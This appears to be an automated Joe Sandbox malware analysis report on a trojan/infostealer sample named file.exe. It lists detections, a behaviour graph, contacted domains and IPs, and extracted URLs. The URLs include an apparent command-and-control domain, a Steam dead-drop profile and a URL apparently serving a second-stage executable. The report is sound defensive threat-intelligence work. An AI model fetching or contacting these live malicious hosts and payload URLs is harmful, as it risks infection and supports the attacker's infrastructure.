          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563923 Sample: file.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 28 story-tense-faz.sbs 2->28 30 steamcommunity.com 2->30 32 9 other IPs or domains 2->32 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus detection for URL or domain 2->48 50 6 other signatures 2->50 8 file.exe 12 2->8         started        signatures3 process4 dnsIp5 34 185.215.113.16, 49792, 80 WHOLESALECONNECTIONSNL Portugal 8->34 36 marshal-zhukov.com 172.67.160.80, 443, 49715, 49724 CLOUDFLARENETUS United States 8->36 38 steamcommunity.com 104.121.10.34, 443, 49708 AKAMAI-ASUS United States 8->38 52 Detected unpacking (changes PE section rights) 8->52 54 Query firmware table information (likely to detect VMs) 8->54 56 Tries to detect sandboxes and other dynamic analysis tools (window names) 8->56 58 9 other signatures 8->58 12 chrome.exe 9 8->12         started        15 chrome.exe 8->15         started        signatures6 process7 dnsIp8 40 192.168.2.10, 138, 443, 49707 unknown unknown 12->40 42 239.255.255.250 unknown Reserved 12->42 17 chrome.exe 12->17         started        20 chrome.exe 15->20         started        process9 dnsIp10 22 s-part-0035.t-0009.t-msedge.net 13.107.246.63, 443, 49858, 49862 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->22 24 www.google.com 142.250.181.100, 443, 49848, 50066 GOOGLEUS United States 17->24 26 6 other IPs or domains 17->26

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe47%ReversingLabsWin32.Trojan.Symmi
          file.exe100%AviraTR/Crypt.TPM.Gen
          file.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://marshal-zhukov.com/apiYB100%Avira URL Cloudmalware
          https://marshal-zhukov.com/y100%Avira URL Cloudmalware
          https://marshal-zhukov.com/)100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          steamcommunity.com
          104.121.10.34
          truefalse
            high
            marshal-zhukov.com
            172.67.160.80
            truefalse
              high
              www.google.com
              142.250.181.100
              truefalse
                high
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  js.monitor.azure.com
                  unknown
                  unknownfalse
                    high
                    powerful-avoids.sbs
                    unknown
                    unknownfalse
                      high
                      property-imper.sbs
                      unknown
                      unknownfalse
                        high
                        mdec.nelreports.net
                        unknown
                        unknownfalse
                          high
                          leg-sate-boat.sbs
                          unknown
                          unknownfalse
                            high
                            occupy-blushi.sbs
                            unknown
                            unknownfalse
                              high
                              disobey-curly.sbs
                              unknown
                              unknownfalse
                                high
                                blade-govern.sbs
                                unknown
                                unknownfalse
                                  high
                                  story-tense-faz.sbs
                                  unknown
                                  unknownfalse
                                    high
                                    motion-treesz.sbs
                                    unknown
                                    unknownfalse
                                      high
                                      frogs-severz.sbs
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          high
                                          https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                            high
                                            https://marshal-zhukov.com/apifalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/chrome_newtabfile.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.linkedin.com/cws/share?url=$chromecache_115.9.dr, chromecache_103.9.drfalse
                                                          high
                                                          https://store.steampowered.com/subscriber_agreement/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://github.com/Youssef1313chromecache_123.9.drfalse
                                                              high
                                                              https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_115.9.dr, chromecache_103.9.drfalse
                                                                high
                                                                https://aka.ms/msignite_docs_bannerchromecache_115.9.dr, chromecache_103.9.drfalse
                                                                  high
                                                                  https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_103.9.drfalse
                                                                    high
                                                                    http://polymer.github.io/AUTHORS.txtchromecache_115.9.dr, chromecache_103.9.drfalse
                                                                      high
                                                                      https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgfile.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524380885.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_123.9.drfalse
                                                                          high
                                                                          http://www.valvesoftware.com/legal.htmfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                high
                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700file.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524380885.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_123.9.drfalse
                                                                                    high
                                                                                    https://aka.ms/pshelpmechoosechromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                      high
                                                                                      https://aka.ms/feedback/report?space=61chromecache_123.9.drfalse
                                                                                        high
                                                                                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://learn-video.azurefd.net/vod/playerchromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://twitter.com/intent/tweet?original_referer=$chromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://marshal-zhukov.com/yfile.exe, 00000003.00000003.1743684827.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctafile.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524380885.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                                                high
                                                                                                                https://github.com/Thrakachromecache_123.9.drfalse
                                                                                                                  high
                                                                                                                  http://microsoft.cofile.exe, 00000003.00000003.1524310129.000000000082B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1834770551.000000000082D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1564208049.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://store.steampowered.com/privacy_agreement/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=OgygW_VDfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://polymer.github.io/PATENTS.txtchromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/points/shop/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://ocsp.rootca1.amazontrust.com0:file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://schema.orgchromecache_103.9.drfalse
                                                                                                                                    high
                                                                                                                                    http://polymer.github.io/LICENSE.txtchromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&afile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.ecosia.org/newtab/file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000003.00000003.1485052718.0000000005725000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://store.steampowered.com/privacy_agreement/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/adegeochromecache_123.9.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://octokit.github.io/rest.js/#throttlingchromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/js-cookie/js-cookiechromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://185.215.113.16/off/def.exefile.exe, 00000003.00000002.1833693998.000000000019A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000003.00000002.1834770551.000000000082D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1743684827.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schema.org/Organizationchromecache_123.9.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=nT6RHKdfWgaJ&amp;l=efile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/dotnet/trychromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://store.steampowered.com/about/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_123.9.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/my/wishlist/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=4Vb3xc8UazdB&afile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://marshal-zhukov.com/)file.exe, 00000003.00000003.1743684827.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                            unknown
                                                                                                                                                                            https://help.steampowered.com/en/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://steamcommunity.com/market/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://store.steampowered.com/news/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Prfile.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524380885.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_123.9.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://store.steampowered.com/subscriber_agreement/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/discussions/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://store.steampowered.com/stats/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&afile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://store.steampowered.com/steam_refunds/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://x1.c.lencr.org/0file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://x1.i.lencr.org/0file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=efile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://github.com/gewarrenchromecache_123.9.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://marshal-zhukov.com/apiYBfile.exe, 00000003.00000003.1482021284.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1481925944.00000000054AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://steamcommunity.com/workshop/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000003.00000003.1485052718.0000000005725000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://polymer.github.io/CONTRIBUTORS.txtchromecache_115.9.dr, chromecache_103.9.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://store.steampowered.com/legal/file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engfile.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_123.9.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_123.9.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                          13.107.246.63
                                                                                                                                                                                                                                          s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          185.215.113.16
                                                                                                                                                                                                                                          unknownPortugal
                                                                                                                                                                                                                                          206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                          104.121.10.34
                                                                                                                                                                                                                                          steamcommunity.comUnited States
                                                                                                                                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                          142.250.181.100
                                                                                                                                                                                                                                          www.google.comUnited States
                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                          172.67.160.80
                                                                                                                                                                                                                                          marshal-zhukov.comUnited States
                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                                          unknownReserved
                                                                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                          192.168.2.10
                                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                          Analysis ID:1563923
                                                                                                                                                                                                                                          Start date and time:2024-11-27 16:30:25 +01:00
                                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                          Overall analysis duration:0h 6m 33s
                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                          Number of analysed new started processes analysed:16
                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                                          Sample name:file.exe
                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@24/70@19/7
                                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 2.22.50.131, 216.58.208.227, 23.52.181.141, 172.217.19.238, 74.125.205.84, 2.16.230.3, 34.104.35.123, 51.132.193.105, 142.250.181.138, 172.217.17.42, 142.250.181.106, 172.217.17.74, 216.58.208.234, 172.217.21.42, 172.217.19.10, 172.217.19.170, 172.217.19.234, 142.250.181.10, 142.250.181.42, 142.250.181.74, 172.217.19.202, 193.108.153.13, 193.108.153.28, 13.74.129.1, 204.79.197.237, 13.107.21.237, 172.217.17.67
                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, onedscolprduks05.uksouth.cloudapp.azure.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, clients.l.google.com, c1.microsoft.com, wcpstatic.microsoft.com
                                                                                                                                                                                                                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                          • VT rate limit hit for: file.exe
                                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                                          10:31:18API Interceptor199x Sleep call for process: file.exe modified
